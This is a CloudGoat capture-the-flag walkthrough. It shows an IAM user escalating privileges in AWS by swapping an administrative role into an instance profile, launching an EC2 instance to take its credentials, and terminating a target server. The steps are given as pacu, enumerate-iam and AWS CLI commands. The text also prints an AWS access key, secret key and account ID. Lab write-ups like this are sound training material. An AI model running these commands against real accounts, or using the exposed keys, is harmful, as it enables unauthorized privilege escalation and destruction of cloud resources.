Cloudgoat AWS CTF solution- Scenerio 5 (iam_privesc_by_attachment)

5 min readOct 19, 2022

Scenario: iam_privesc_by_attachment


git clone
cd cloudgoat
chmod +x
./ create iam_privesc_by_attachment

Scenario Resources

  • 1 VPC with: EC2 x 1
  • 1 IAM User

Scenario Start(s)

  1. IAM User “Kerrigan”

Scenario Goal(s)

Delete the EC2 instance “cg-super-critical-security-server”


Starting with a very limited set of permissions, the attacker is able to leverage the instance-profile-attachment permissions to create a new EC2 instance with significantly greater privileges than their own. With access to this new EC2 instance, the attacker gains full administrative powers within the target account and is able to accomplish the scenario’s goal — deleting the cg-super-critical-security-server and paving the way for further nefarious actions.

Exploitation Route(s)

Walkthrough — IAM User “kerrigan”

  1. Starting as the IAM user “Kerrigan,” the attacker uses their limited privileges to explore the environment.

a. Used pacu’s “iam__bruteforce_permissions” module to enumerate permissions-

run iam__bruteforce_permissions


b. Using iam-enumerate to Bruteforce permissions.

git clone
cd enumerate-iam/
pip3 install -r requirements.txt
cd enumerate_iam
git clone

after downloading aws-sdk-js in “enumerate_iam” folder run the script.

c. Running “enumerate-iam

python3 --access-key AKIA4SM4ZEUHX7V5LYEU --secret-key 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

2. Checking running ec2 instances using ec2:DescribeInstances-

aws ec2 describe-instances --region us-east-1 --profile kerrigan --output text

3. Checking available instance profiles-

aws iam list-instance-profiles --profile kerrigan

We found a interesting instance profile “arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22” with role “cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22”.

4. Let’s list roles as we have list-roles permissions-

aws iam list-roles --profile kerrigan

We found 2 interesting roles-

cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 and cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 and by looking at the name “mighty” one seems more interesting.

5. Let’s try to add “mighty” role to the instance profile.

Note: Our enumeration tools like pacu or iam-enumerate were unable to determine these four permissions-

“iam:AddRoleToInstanceProfile”,“iam:RemoveRoleFromInstanceProfile”, “ec2:AssociateIamInstanceProfile”,”ec2:RunInstances

but upon manually checking I found our user has these additional permissions..

aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan

we got an error “Cannot exceed quota for InstanceSessionsPerInstanceProfile: 1”. Let’s try to remove the existing attached role and try to add “mighty” role-

aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerriganaws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan
we didn’t got any error this time

6. Now we can use “AssociateIamInstanceProfile” permission to associate this profile(“cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22”) with running ec2.

aws ec2 associate-iam-instance-profile --iam-instance-profile file://instance_profile.json --instance-id "i-0f1a8f37275d27fcd" --profile kerrigan --region

7. No we are ready to spin an ec2 instance with full permissions

a) Creating ec2 ssh_key_pair

aws ec2 create-key-pair --key-name pwned --profile kerrigan --query 'KeyMaterial' --region us-east-1 --output text > pwned.pem

b) Running ec2-

aws ec2 describe-security-groups --profile kerrigan --region us-east-1aws ec2 describe-subnets --profile kerrigan --region us-east-1
aws ec2 run-instances --image-id ami-0a313d6098716f372 --instance-type t2.micro --iam-instance-profile Arn=arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgid7c11loyvlf --key-name pwned --profile kerrigan --subnet-id subnet-07be3953f5accbd47 --security-group-ids sg-0523b1376503ede0a --region us-east-1
Then use describeinstance to get public ip

8. Logging in and fetching credentials from this instance-

ssh -i pwned.pem ubuntu@


We can directly install aws cli withing the ec2 instance and then run the commands within ec2 cli.

9. Using these credentials to delete “cg-super-critical-security-server”

#Determining instance id
aws ec2 describe-instances --region us-east-1 --profile ec2_role


aws ec2 terminate-instances --instance-ids i-0064345de3f005c7a --region us-east-1 --profile ec2_role